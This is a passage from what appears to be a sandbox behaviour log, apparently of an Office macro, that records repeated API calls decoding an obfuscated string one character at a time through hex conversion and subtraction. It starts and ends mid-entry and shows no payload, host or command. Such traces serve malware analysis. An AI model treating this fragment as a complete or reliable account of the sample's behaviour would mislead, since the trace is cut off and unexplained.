(_Size=0xa0) returned 0x11f50080 [0175.037] free (_Block=0x11f50080) [0175.037] VarBstrCat (in: bstrLeft="&H", bstrRight="de", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.037] GetUserDefaultLCID () returned 0x409 [0175.037] VarI2FromStr (in: strIn="&Hde", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.038] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0175.038] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.038] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.038] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.038] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.038] GetUserDefaultLCID () returned 0x409 [0175.038] malloc (_Size=0xa0) returned 0x11f50080 [0175.038] free (_Block=0x11f50080) [0175.038] VarBstrCat (in: bstrLeft="&H", bstrRight="ba", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.039] GetUserDefaultLCID () returned 0x409 [0175.039] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.039] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.039] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.039] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.039] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.039] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.039] GetUserDefaultLCID () returned 0x409 [0175.039] malloc (_Size=0xa0) returned 0x11f50080 [0175.039] free (_Block=0x11f50080) [0175.040] VarBstrCat (in: bstrLeft="&H", bstrRight="ca", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.040] GetUserDefaultLCID () returned 0x409 [0175.040] VarI2FromStr (in: strIn="&Hca", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.040] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0175.040] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.040] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.040] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.040] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.040] GetUserDefaultLCID () returned 0x409 [0175.040] malloc (_Size=0xa0) returned 0x11f50080 [0175.040] free (_Block=0x11f50080) [0175.041] VarBstrCat (in: bstrLeft="&H", bstrRight="a3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.041] GetUserDefaultLCID () returned 0x409 [0175.041] VarI2FromStr (in: strIn="&Ha3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.041] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="4") returned 1 [0175.041] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.041] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.041] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.041] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.041] GetUserDefaultLCID () returned 0x409 [0175.041] malloc (_Size=0xa0) returned 0x11f50080 [0175.042] free (_Block=0x11f50080) [0175.042] VarBstrCat (in: bstrLeft="&H", bstrRight="b6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.042] GetUserDefaultLCID () returned 0x409 [0175.042] VarI2FromStr (in: strIn="&Hb6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.042] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.042] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.042] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.042] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.043] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.043] GetUserDefaultLCID () returned 0x409 [0175.043] malloc (_Size=0xa0) returned 0x11f50080 [0175.043] free (_Block=0x11f50080) [0175.043] VarBstrCat (in: bstrLeft="&H", bstrRight="d1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.043] GetUserDefaultLCID () returned 0x409 [0175.043] VarI2FromStr (in: strIn="&Hd1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.043] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.043] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.044] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.044] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.044] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.044] GetUserDefaultLCID () returned 0x409 [0175.044] malloc (_Size=0xa0) returned 0x11f50080 [0175.044] free (_Block=0x11f50080) [0175.044] VarBstrCat (in: bstrLeft="&H", bstrRight="c4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.044] GetUserDefaultLCID () returned 0x409 [0175.044] VarI2FromStr (in: strIn="&Hc4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.044] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0175.045] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.045] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.045] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.045] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.045] GetUserDefaultLCID () returned 0x409 [0175.045] malloc (_Size=0xa0) returned 0x11f50080 [0175.045] free (_Block=0x11f50080) [0175.045] VarBstrCat (in: bstrLeft="&H", bstrRight="99", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.045] GetUserDefaultLCID () returned 0x409 [0175.045] VarI2FromStr (in: strIn="&H99", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.046] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="4") returned 1 [0175.046] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.046] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.046] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.046] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.046] GetUserDefaultLCID () returned 0x409 [0175.046] malloc (_Size=0xa0) returned 0x11f50080 [0175.046] free (_Block=0x11f50080) [0175.047] VarBstrCat (in: bstrLeft="&H", bstrRight="b5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.047] GetUserDefaultLCID () returned 0x409 [0175.047] VarI2FromStr (in: strIn="&Hb5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.047] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.047] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.047] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.047] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.047] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.047] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.047] GetUserDefaultLCID () returned 0x409 [0175.047] malloc (_Size=0xa0) returned 0x11f50080 [0175.048] free (_Block=0x11f50080) [0175.050] VarBstrCat (in: bstrLeft="&H", bstrRight="c3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.050] GetUserDefaultLCID () returned 0x409 [0175.050] VarI2FromStr (in: strIn="&Hc3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.050] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.050] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.050] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.051] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.051] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.051] GetUserDefaultLCID () returned 0x409 [0175.051] malloc (_Size=0xa0) returned 0x11f50080 [0175.051] free (_Block=0x11f50080) [0175.051] VarBstrCat (in: bstrLeft="&H", bstrRight="b3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.051] GetUserDefaultLCID () returned 0x409 [0175.051] VarI2FromStr (in: strIn="&Hb3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.051] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0175.052] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.052] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.052] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.052] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.052] GetUserDefaultLCID () returned 0x409 [0175.052] malloc (_Size=0xa0) returned 0x11f50080 [0175.052] free (_Block=0x11f50080) [0175.052] VarBstrCat (in: bstrLeft="&H", bstrRight="93", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.052] GetUserDefaultLCID () returned 0x409 [0175.052] VarI2FromStr (in: strIn="&H93", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.053] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.053] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.053] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.053] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.053] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.053] GetUserDefaultLCID () returned 0x409 [0175.053] malloc (_Size=0xa0) returned 0x11f50080 [0175.053] free (_Block=0x11f50080) [0175.053] VarBstrCat (in: bstrLeft="&H", bstrRight="b9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.053] GetUserDefaultLCID () returned 0x409 [0175.054] VarI2FromStr (in: strIn="&Hb9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.054] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0175.054] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.054] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.054] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.054] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.054] GetUserDefaultLCID () returned 0x409 [0175.054] malloc (_Size=0xa0) returned 0x11f50080 [0175.054] free (_Block=0x11f50080) [0175.055] VarBstrCat (in: bstrLeft="&H", bstrRight="9f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.055] GetUserDefaultLCID () returned 0x409 [0175.055] VarI2FromStr (in: strIn="&H9f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.055] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.055] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.055] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.055] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.055] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.055] GetUserDefaultLCID () returned 0x409 [0175.055] malloc (_Size=0xa0) returned 0x11f50080 [0175.055] free (_Block=0x11f50080) [0175.056] VarBstrCat (in: bstrLeft="&H", bstrRight="ba", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.056] GetUserDefaultLCID () returned 0x409 [0175.056] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.056] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.056] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.056] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.056] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.056] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.056] GetUserDefaultLCID () returned 0x409 [0175.057] malloc (_Size=0xa0) returned 0x11f50080 [0175.057] free (_Block=0x11f50080) [0175.057] VarBstrCat (in: bstrLeft="&H", bstrRight="a0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.057] GetUserDefaultLCID () returned 0x409 [0175.057] VarI2FromStr (in: strIn="&Ha0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.057] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0175.057] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.057] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.058] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.058] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.058] GetUserDefaultLCID () returned 0x409 [0175.058] malloc (_Size=0xa0) returned 0x11f50080 [0175.058] free (_Block=0x11f50080) [0175.058] VarBstrCat (in: bstrLeft="&H", bstrRight="c5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.058] GetUserDefaultLCID () returned 0x409 [0175.058] VarI2FromStr (in: strIn="&Hc5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.058] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.059] MultiByteToWideChar (in: CodePage=0x0, 